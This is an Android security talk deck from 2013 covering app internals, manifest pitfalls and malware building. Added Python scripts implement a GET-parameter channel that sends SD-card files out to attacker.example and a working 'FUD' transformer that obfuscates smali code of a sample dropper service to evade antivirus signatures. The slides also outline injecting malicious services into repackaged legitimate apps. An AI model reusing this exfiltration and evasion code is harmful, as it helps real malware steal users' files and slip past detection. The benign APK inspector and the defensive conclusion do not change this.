These slides were presented at the GDG MeetUp in Bangalore held on 21st September 2013. I am uploading the slide deck to help the people who asked for it.
2. ./AboutMe.sh
Information Security Researcher
Trainer at BlackHat, OWASP AppSec, ToorCon, SysCan.
Lead Developer of AFE (Android Framework for Exploitation)
Python lover
Co-founder of XYSEC (http://xysec.com)
Have found bugs in some famous websites including Google, Apple, Microsoft, Skype, Adobe and many more
Monday, 23 September 13
3. Some Companies I have found Vulnerabilities in .....
And many more...
4. ./Agenda
Quick Introduction to Android Internals
Android Security Model
Android Coding Best Practices
Android Malware: techniques and their effectiveness, using AFE (Android Framework for Exploitation)
Small Social Experiment !
5. Android Internals.exe
Based on Linux kernel version 3.x (version 2.6 prior to Android 4.0 ICS)
Applications run on the Dalvik VM (Dalvik Virtual Machine; replaced by ART from Android 5.0 onwards)
Dalvik executes dex (Dalvik executable) bytecode, which ships as classes.dex inside the apk
An apk file is a zip archive containing the resources, the signature files (META-INF), classes.dex and the AndroidManifest.xml file
6. Android Security Model.txt
Applications are sandboxed: each one runs under its own Linux UID and GID
Zygote forks a new process for each application
Each application runs in its own instance of the Dalvik VM
Access to sensitive and hardware APIs is gated by permissions
Permissions are declared in the AndroidManifest.xml file
7. Android Application.apk
Just an archive!
Written mainly in Java, with the resources and the manifest in XML
Multiple entry points, such as Activities, Services, Broadcast Receivers (reached through Intents), Content Providers, etc.
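The two slides above (the Dalvik/apk internals and "Just an archive!") describe the package layout in words. The following script, an added example that is not part of the original slides or of AFE, opens an APK with nothing more than Python's zipfile module and reports the parts the slides name: the manifest, classes.dex (checked by its `dex\n0NN\0` magic), resources.arsc and the v1 (JAR-style) signature files under META-INF. The APK it inspects is a constructed, in-memory stand-in with the real entry names but placeholder contents; the package name and file contents are made up.

```python
"""Inspect an APK as the ZIP archive it is.

Added example, not code from the original slides or from AFE. It builds a
tiny, constructed APK-shaped archive in memory (real entry names, stand-in
contents) and then lists the parts the slides name: AndroidManifest.xml,
classes.dex, resources and the META-INF signature files.
"""
import io
import struct
import zipfile

DEX_MAGIC = b"dex\n"


def build_sample_apk() -> bytes:
    """Constructed sample: a minimal archive shaped like an APK."""
    dex = bytearray(0x70)                        # a real DEX header is 0x70 bytes
    dex[0:8] = b"dex\n035\x00"                   # magic + version "035"
    struct.pack_into("<I", dex, 32, len(dex))    # file_size field lives at offset 0x20
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", "<manifest package='com.example.app'/>")
        z.writestr("classes.dex", bytes(dex))
        z.writestr("resources.arsc", b"\x02\x00\x0c\x00")
        z.writestr("res/layout/main.xml", b"<layout/>")
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
        z.writestr("META-INF/CERT.RSA", b"\x30\x82")   # stand-in for the PKCS#7 blob
    return buf.getvalue()


def dex_version(data: bytes):
    """Return the DEX format version ("035", "038", ...) or None if not a DEX file."""
    if len(data) < 8 or data[:4] != DEX_MAGIC or data[7] != 0:
        return None
    return data[4:7].decode("ascii")


def inspect_apk(apk_bytes: bytes) -> dict:
    """Summarise the archive: which mandatory parts exist and whether it is v1-signed."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        dex_files = [n for n in names if n.startswith("classes") and n.endswith(".dex")]
        sig_files = [n for n in names
                     if n.startswith("META-INF/") and n.endswith((".RSA", ".DSA", ".EC"))]
        versions = {n: dex_version(z.read(n)) for n in dex_files}
        return {
            "has_manifest": "AndroidManifest.xml" in names,
            "has_resources": "resources.arsc" in names,
            "dex_files": dex_files,
            "dex_versions": versions,
            # JAR signing is the only scheme that existed in 2013; the v2/v3 APK
            # Signature Scheme (Android 7.0+) lives in a signing block, not META-INF.
            "v1_signed": bool(sig_files) and "META-INF/MANIFEST.MF" in names,
            "signature_blocks": sig_files,
        }


if __name__ == "__main__":
    print(inspect_apk(build_sample_apk()))
```

Run it against a real package by replacing `build_sample_apk()` with `open("app.apk", "rb").read()`; multidex apps show up as classes.dex, classes2.dex, and so on.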
10. Uploading a sensitive file from the SD card to a remote server without any permission!
Flow shown on the slide: read a file from the SD card -> open the browser through an Intent with the file contents in a GET parameter -> the server saves the parameter value to a file.
No permission was required for READING files from the SD card (true of Android at the time of this talk; READ_EXTERNAL_STORAGE has been enforced since Android 4.4, API 19)
Opening the browser through an INTENT doesn't require any permission either, so the app never declares INTERNET:
    startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://google.com/")));
The server saves the value of the GET parameter to a file.
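The slide shows the channel as three boxes; what it does not show is what a file has to go through to fit in a URL and how the listener turns the requests back into a file. The script below is an added example, not code from the slides or from AFE. The Android side (reading the SD card, firing ACTION_VIEW) is Java and is not reproduced; this is the encoding the app would apply and the decoding a listener does, with chunks allowed to arrive out of order. The host name, parameter names, chunk-count limit and URL length are assumptions.

```python
"""Data channel from slide 10: file contents leave the phone as GET-parameter
values carried by the browser, and the listener writes them back to a file.

Added example, not code from the slides or from AFE. The host name,
parameter names, chunk index limit (9999) and URL length are assumptions.
"""
import base64
import hashlib
from typing import Dict, List
from urllib.parse import parse_qs, urlencode, urlparse

EXFIL_BASE = "http://attacker.example/c"   # assumed listener URL
MAX_URL = 2000                              # assumed URL length the stock browser accepts


def file_id(name: str) -> str:
    """Short stable id so the listener can group the chunks of one file."""
    return hashlib.sha1(name.encode()).hexdigest()[:8]


def chunk_for_get(name: str, data: bytes, max_url: int = MAX_URL) -> List[str]:
    """Split data into URLs; each query carries file id, chunk index, count and payload."""
    fid = file_id(name)
    # Fixed part of every URL, sized for at most 9999 chunks per file.
    overhead = len(EXFIL_BASE) + 1 + len(urlencode({"f": fid, "i": "9999", "n": "9999", "d": ""}))
    payload_len = max_url - overhead
    if payload_len < 4:
        raise ValueError("max_url leaves no room for a payload")
    # base64url keeps the payload out of the reserved URL characters; only the
    # trailing "=" padding of the last chunk gets percent-encoded (at most +4 chars).
    b64 = base64.urlsafe_b64encode(data).decode("ascii")
    chunks = [b64[i:i + payload_len] for i in range(0, len(b64), payload_len)] or [""]
    return [
        EXFIL_BASE + "?" + urlencode({"f": fid, "i": i, "n": len(chunks), "d": c})
        for i, c in enumerate(chunks)
    ]


def reassemble(urls: List[str]) -> Dict[str, bytes]:
    """Listener side: parse each request's query string and rebuild complete files.

    Chunks may arrive in any order; a file with missing chunks is not returned
    yet, which is what a listener logging live requests has to cope with.
    """
    parts: Dict[str, dict] = {}
    for url in urls:
        q = parse_qs(urlparse(url).query, keep_blank_values=True)
        fid, idx, total, chunk = q["f"][0], int(q["i"][0]), int(q["n"][0]), q["d"][0]
        parts.setdefault(fid, {"n": total, "chunks": {}})["chunks"][idx] = chunk
    out: Dict[str, bytes] = {}
    for fid, entry in parts.items():
        if len(entry["chunks"]) == entry["n"]:
            joined = "".join(entry["chunks"][i] for i in range(entry["n"]))
            out[fid] = base64.urlsafe_b64decode(joined)
    return out


if __name__ == "__main__":
    sample = bytes(range(256)) * 12               # constructed 3 KiB "secret" file
    urls = chunk_for_get("secret.txt", sample)
    print(len(urls), "requests;", "round trip ok:", reassemble(urls) == {file_id("secret.txt"): sample})
```

The point for defenders is the cost side: every request is a full-screen browser launch that the user can see, and the channel carries roughly 1.4 KiB per request, so a detection rule on a burst of same-host GETs with long query strings from the browser is cheap.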
12. Android Coding Best Practices
Follow -> http://developer.android.com/guide/practices/index.html
Top 10 Mobile Risks (outdated) -> https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
Attend more GDG talks and other security conferences
Shoot me a tweet @sunnyrockzzs
14. AndroidManifest.xml OMG ! (Contd.)
android:exported="true" on a <provider> will turn into a nightmare: any app on the device can query, insert into and update it unless a read/write permission is set!
BTW, it is "true" by default if either android:minSdkVersion or android:targetSdkVersion is set to "16" or lower. For applications that set either of these attributes to "17" or higher, the default is "false".
17. Android Malware (Common Features)
Send SMS to premium numbers
Subscribe to premium services
Dial premium numbers
Steal messages, contact list, logs
Steal SD-card files
Auto-respond to the attacker's text messages!
18. Creating a Malware.vbs
Use CONTENT PROVIDERS
Make use of CURSORS and SQLite databases
Write Java code like crazy
Set up the server component
Get frustrated, start again from bullet point one.
19. If you don't have a past relationship with Java
23. “I am not Afraid” - Eminem
24. Faking a Legitimate Application?
Malware services are generally injected into legitimate applications
How to do it?
legitimate apk -> decompile to Smali/Java -> add malicious services/classes -> recompile and re-sign -> final malware
25. USE AFE TO AUTOMATE !!
26. Android Framework for Exploitation.py
To make your life easier!
Find security vulnerabilities in your device and apps
Protect your device against malware
Create automated malware/botnets and send the data to a Python listener
Inject malicious services into other applications
Use Android exploits
Crypt existing malware to make it FUD (fully undetectable)
29. Let's Make it FUD
What the anti-virus engine checks:
Matches the signature with its database
Checks the activity, service and other class names
Checks the names of the variables
Checks the control flow graph

30. Let's Make it FUD (Contd.)
Rebuild + Zipalign: the rebuilt apk no longer matches a file-hash signature

31. Let's Make it FUD (Contd.)
Modify the class names and all their references within the files
Example: converts com.example.org to com.omg.lol

32. Let's Make it FUD (Contd.)
Split string constants in two and append them at runtime
Example:
String a = "hello"
will now become
String aa = "hel"
String ab = "lo"
String a = aa + ab

33. Let's Make it FUD (Contd.)
Add dummy loops to change the CFG
Example (labels in smali style):
goto :end
:start    // the original method body; runs only when jumped to
........
:end      // reached only through the goto above; jumps straight back to the body
goto :start
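The three transforms on slides 31 to 33 are described one at a time; the script below, an added example that is not AFE's own code, applies all three to smali text, which is the form the repackaging slide (24) works on after apktool/baksmali has decoded the apk. It assumes that decoder's conventions: a `.locals N` line at the top of each method and parameters referred to as pN (bumping `.locals` by one shifts the vN aliases of parameters, so explicit vN parameter registers would break), and no existing labels named `afe_*`. The string split respects the 4-bit register fields of `invoke-virtual {vA, vB}` and never cuts inside an escape sequence. The smali sample and its package names are constructed.

```python
"""Three transforms from the "Let's Make it FUD" slides, applied to smali text.

Added example, not AFE's own code. Assumes baksmali output conventions
(`.locals N` per method, pN parameter names, no labels named afe_*).
The smali sample is constructed.
"""
import re

SMALI_SAMPLE = """\
.class public Lcom/example/org/Dropper;
.super Landroid/app/Service;

.method public onCreate()V
    .locals 1

    const-string v0, "hello"
    invoke-static {v0}, Lcom/example/org/Util;->send(Ljava/lang/String;)V
    return-void
.end method
"""

CONST_STRING = re.compile(r'^(\s*)const-string v(\d+), "((?:[^"\\]|\\.)*)"\s*$')
LOCALS = re.compile(r"^(\s*)\.locals (\d+)\s*$")
CONCAT = "Ljava/lang/String;->concat(Ljava/lang/String;)Ljava/lang/String;"


def rename_package(smali: str, old: str, new: str) -> str:
    """Slide 31: com.example.org -> com.omg.lol in every type descriptor.

    Rewrites .class/.super lines, invoke-* targets and field references alike;
    the .smali file itself must then be moved to the matching directory.
    """
    return smali.replace("L" + old.replace(".", "/") + "/", "L" + new.replace(".", "/") + "/")


def split_strings(smali: str) -> str:
    """Slide 32: const-string "hello" becomes "hel" + "lo", concatenated at runtime."""
    out, scratch = [], None          # scratch: the extra local that holds the tail half
    for line in smali.splitlines():
        m = LOCALS.match(line)
        if m:
            scratch = int(m.group(2))                    # first free local is vN
            out.append(f"{m.group(1)}.locals {scratch + 1}")
            continue
        if line.strip() == ".end method":
            scratch = None
        m = CONST_STRING.match(line)
        # invoke-virtual {vA, vB} encodes each register in 4 bits: both must be < 16.
        if m and scratch is not None and scratch < 16 and int(m.group(2)) < 16:
            ind, reg, s = m.groups()
            units = re.findall(r'[^"\\]|\\.', s)         # one unit per char or escape
            if len(units) >= 2:
                cut = (len(units) + 1) // 2
                head, tail = "".join(units[:cut]), "".join(units[cut:])
                out += [
                    f'{ind}const-string v{reg}, "{head}"',
                    f'{ind}const-string v{scratch}, "{tail}"',
                    f"{ind}invoke-virtual {{v{reg}, v{scratch}}}, {CONCAT}",
                    f"{ind}move-result-object v{reg}",
                ]
                continue
        out.append(line)
    return "\n".join(out) + "\n"


def add_cfg_detour(smali: str) -> str:
    """Slide 33: goto :end / :start <body> / :end goto :start around each method body.

    Same behaviour, different control-flow graph. Methods without a
    .locals/.registers line (abstract, native) are left alone.
    """
    out, n, armed = [], 0, False
    for line in smali.splitlines():
        s = line.strip()
        if s.startswith(".method "):
            n, armed = n + 1, False
        elif s.startswith((".locals ", ".registers ")):
            out += [line, f"    goto :afe_end_{n}", f"    :afe_start_{n}"]
            armed = True
            continue
        elif s == ".end method" and armed:
            out += [f"    :afe_end_{n}", f"    goto :afe_start_{n}"]
            armed = False
        out.append(line)
    return "\n".join(out) + "\n"


def make_fud(smali: str) -> str:
    """Apply the three transforms in the order the slides present them."""
    return add_cfg_detour(split_strings(rename_package(smali, "com.example.org", "com.omg.lol")))


if __name__ == "__main__":
    print(make_fud(SMALI_SAMPLE))
```

After the rewrite the file goes back through smali/apktool b, signing and zipalign (slide 30). The defender's takeaway is the one the conclusion slide draws: none of these changes touch what the code does at runtime, so a sandbox that watches for the premium SMS or the outgoing upload is unaffected, while a static signature on class names, string constants or the CFG is not.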
37. ./Conclusion -h
Be safe
Don't download apps from 3rd-party markets
Turn USB debugging OFF
Anti-virus vendors -> switch to dynamic analysis
Focus on BYOD security
We also conduct trainings on Advanced Mobile Hands-on Security/Exploitation for both Android and iOS
38. HEY WAIT!! WHERE IS THE SOCIAL EXPERIMENT?